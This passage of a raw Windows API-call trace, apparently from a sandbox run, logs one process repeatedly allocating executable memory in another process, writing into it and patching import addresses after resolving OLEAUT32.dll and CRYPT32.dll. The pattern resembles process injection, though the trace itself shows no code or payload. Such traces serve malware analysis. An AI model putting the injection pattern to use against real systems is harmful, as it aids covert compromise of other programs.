Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.362] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.362] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.362] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.362] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.362] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.363] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.363] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.363] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.363] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.363] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.363] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a430, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.363] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.363] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c8a2*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c8a2*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.364] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.364] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.364] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.364] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.364] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.364] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.364] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.365] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.365] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.365] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.365] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.365] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.365] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a438, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.365] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c8d4, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="OLEAUT32.dll") returned 13 [0241.365] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.365] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0241.365] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.366] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.366] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.366] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.366] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.366] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.366] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.368] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.368] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.368] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.368] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.368] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.368] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.368] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.368] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.369] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.369] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.369] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.369] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.369] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.369] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.369] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.370] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.370] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.370] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.370] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.370] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.370] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.370] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.370] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.371] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.371] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.371] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.371] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.371] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.371] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.371] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.371] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.371] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.372] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.372] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.372] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.372] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.372] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.372] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.373] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.373] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.373] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.373] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.373] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.373] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.373] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.373] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.374] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.374] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.374] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.374] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.374] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.374] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.374] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.375] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.375] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.375] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.375] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.375] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0241.375] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.375] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.375] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.376] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.376] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.376] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.376] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.376] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.376] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.376] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.377] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.377] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.377] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c8fa, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="CRYPT32.dll") returned 12 [0241.377] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.377] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0241.377] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.377] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.377] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.378] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.378] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.378] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.378] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.381] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.381] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.381] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) 